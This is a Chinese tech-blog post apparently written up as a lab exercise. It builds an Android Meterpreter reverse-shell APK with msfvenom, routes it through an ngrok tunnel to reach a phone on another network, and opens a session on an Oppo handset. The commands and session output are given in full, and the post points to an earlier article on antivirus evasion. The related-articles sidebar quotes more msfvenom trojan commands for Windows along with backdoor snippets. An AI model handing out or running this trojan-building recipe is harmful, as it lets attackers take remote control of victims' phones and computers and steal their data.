Metasploit实验:android内网的反弹控制

最新推荐文章于 2023-04-26 14:41:13 发布
最新推荐文章于 2023-04-26 14:41:13 发布
阅读量480 收藏 2
点赞数
文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjwqp/article/details/105457024
版权

 

一。测试环境:

    实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX):

    安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX):

 

   思路:制作payload,攻击,映射端口

二、准备:一个ngrok帐号。

    2.1没有可以去注册:https://www.ngrok.cc/login/register,选择免费的隧道,协议选择TCP ,如下图结果:

    2.2注册好帐号,在下载对应的客户端,我选择的是64位的系统,下载运行。

 

cd /root/下载/linux_amd64/
./sunny clientid 0159XX8b07aXXXXX  //隧道id

运行NGROK后提示下列信息:

Sunny-Ngrok   官 网 www.ngrok.cc+C 退 出 )


                                          
Tunnel Status                 online 
 

免费的要多连几次,也可以购买1个月的玩一下,才10大洋!

三、生成payload

运行

     msfvenom -p android/meterpreter/reverse_tcp lhost=free.XXXXX.com lport=11009 R > /home/fandan.apk

红色部分换成你申请的服务器地址和服务器对应的端口,一定要记得!

结果显示如下:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10191 bytes

要是 免杀可以参考上一篇文章:https://blog.csdn.net/wjwqp/article/details/105420153

生成不了要确认服务端口和隧道ID是否正确

四、启动msfconsole,运行:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.XX
exploit

五、把fandan.apk上传到安卓Oppo手机。

 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.XX:11009
[*] Sending stage (73548 bytes) to 192.168.0.XX
[*] Meterpreter session 2 opened (192.168.0.XX:11009 -> 192.168.0.XX:41230) at 2020-04-11 20:39:23 +0800

meterpreter > sysinfo
Computer    : localhost
OS          : Android 9 - Linux 4.9.112-perf+ (aarch64)
Meterpreter : dalvik/android
meterpreter >ipconfig  //  查看oppo的ip地址


 

 

好了,现在可以在msf下对appo手机进行访问了。

本实验到此结算

 

grn0bmp
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安卓手机APP实现MODBUS TCP对局域网内设备的控制
05-30
用户可以根据需求在驱动库里选择相对应的通讯驱动程序,配置相应的通讯握手参数,自由定义需要控制和采集的变量名、通讯地址、数据类型和初始值。功能说明及图片展示: 1.安装完成首次进入将会显示三页功能简要展示页面。 2.点击“立即使用”按钮,进入登录界面(公测账户为admin,密码admin)。 3.登录成功进入APP主页,此时主页所有状态为初始未配置状态。 4.在主页状态下向右滑动,可打开功能模块选择列表。 5.点击“WIFI连接”进入连接现场设备网络页面,如果此时用户已通过手机WIFI页面连接现场设备,则直接跳过此步骤。 6.连接成功后返回功能模块选择列表,点击“参数设置”进入通讯相关参数配置页面(首先进入驱动配置页面),目前驱动库中只有支持Modbus TCP的驱动,后续会持续更新,用户通过在驱动库列表中长按操作将选中的驱动挑选至已选列表中,如果要取消,可以在已选列表中通过同样的长按操作完成。 7.配置要访问的设备通讯参数,与主页的操作逻辑一致,在驱动配置页面向右滑动打开配置功能列表,点击“通讯参数配置”进入通讯参数配置页,然后点击右上角的加号,此时软件会根据已选的驱动类型自动添加一条相对应的通讯参数,用户可以通过双击的方式打开修改列表,然后在列表的某一条参数处通过长按的方式进入最终的修改对话框,修改完成后,可以通过长按的方式选定当前需要的参数配置信息到已选区域。 8.通讯参数配置完成后,向右滑动进入配置功能列表,点击“IO参数配置”进入地址段的分配,点击右上角的加号,在弹出的对话框中根据实际需求分配响应的起始地址以及地址数量,分配完成后,可在屏幕右侧边缘向左滑动调出隐藏功能菜单,通过功能菜单可查看和修改配置地址段的功能对应的IO点信息。 9.所有配置完成后,可返回主页,此时主页显示当前配置的信息,其中“控制操作”功能可以通过按钮发送布尔值,操作逻辑为当前值为0时发送1,当前值为1时发送0,而“参数设置”功能通过对子项长按可以设置调出输入框设置相应的参数值。
Mastering-Metasploit:掌握Metasploit书中的Metasploit模块
05-17
#要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / Mastering-Metasploit / modules / 加载了12个模块: 2 ...
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1325
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件到msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
使用Metasploit web_delivery 反弹shell
大方子
02-07 5376
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9643
序 接《Metasploit上使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit上使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
Metasploit常用后渗透脚本——远程监视
渗透测试
06-05 2273
文章目录前言一、迁移进程二、安装远程VNC会话三、关闭杀毒软件四、获取系统密码哈希值五、查看目标机上的所有流量六、提取系统信息七、控制持久化八、查看更多脚本总结 前言 本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程 测试环境 描述 ip 主机 kali 2020 192.168.1.113 靶机 winxp sp3 192.168.1.106 首先使用ms08_067渗透模块对靶机进行渗透测试,详细步骤看 ms08_067漏洞渗透步
metasploit:自动运行Metasploit脚本
05-11
Metasploit自动化脚本运行详解》 Metasploit,作为一个知名的开源安全工具,被广泛应用于渗透测试和安全研究中。其强大的功能在于提供了一套完整的框架,允许安全专家利用已知漏洞进行测试和评估。在本文中,我们...
metasploit-framework:Metasploit框架
02-04
Metasploit Metasploit框架以BSD样式的许可证发布。 有关更多详细信息,请参见。 该软件的最新版本可从以下网站获得: : 错误跟踪和开发信息可以在以下位置找到: : 新错误和功能请求应定向至: : 可以在...
metasploit-modules:我的metasploit模块
05-23
"metasploit-modules-master"这个文件名可能是该模块存储库的主分支,通常在Git版本控制系统中,"master"分支代表了项目的主线代码。下载并解压这个压缩包后,用户可以将其中的模块导入到他们的Metasploit环境中,以...
metasploit实验报告及漏洞利用代码
01-11
实验报告将深入探讨Metasploit的使用方法,以及如何通过它来编写和执行漏洞利用代码。 首先,我们需要理解什么是Metasploit框架。它是一个全面的平台,集成了多种工具和服务,可以自动化漏洞探测、利用和后渗透...
Metasploit后门攻击android
最新发布
2301_77778745的博客
04-26 406
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6265
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
漏洞实验:CVE-2018-15982-Adobe Flash Player远程代码执行漏洞
KEY0NE的个人博客
12-26 431
漏洞简介漏洞名称Adobe Flash Player远程代码执行漏洞威胁类型远程代码执行威胁等级高漏洞IDCVE-2018-15982利用场景攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。受影响系统及应用版本Adobe Flash Player(31.0.0.153及...
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 4683
ms08-067
简单记录自己利用meterpreter入侵安卓机
weixin_44731948的博客
01-16 1151
简单记录自己利用meterpreter入侵安卓机 需要准备 一台安卓机 安装kali Linux系统 入侵流程 kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件 将apk文件发送到安卓手机(方式自行选择,此处可扩展) 手机安装apk,为了测试成功,还需根据测试目的授予相应权限 kali
msf生成的攻击载荷进行免杀处理
Solar's Blog
04-30 3680
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
kali攻防第9章 Metasploit之我的远程控制软件
热门推荐
安全参透之旅
12-07 1万+
准备工具 1、KALI系统 IP 10.10.10.131 2、受害系统 IP 10.10.10.133     步骤: 1、生成木马控制程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44
[我的作死案例]图书馆泡妹记 上
wjy397的专栏
06-28 3220
https://bbs.ichunqiu.com/thread-24168-1-1.html 吾本布衣i春秋-呆萌菜鸟 发表于前天14:28253388 本帖最后由 0nise 于 2017-6-26 10:14 编辑 缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...
Metasploit渗透
一个码农的笔记
01-31 4191
Metasploit渗透 在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell 首先用Metasploit生成反弹马,也就是生成反弹的payload: 成功生成反弹型payload: (1)生成win下的exe msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp L
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
接着,作者进行了一个简单的栈溢出实验,展示了如何通过MsfconsoleMetasploit框架的命令行界面)创建payload,让恶意代码能够通过溢出攻击覆盖目标程序的栈区域,进而控制程序流程。溢出攻击通常利用内存中的缓冲...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值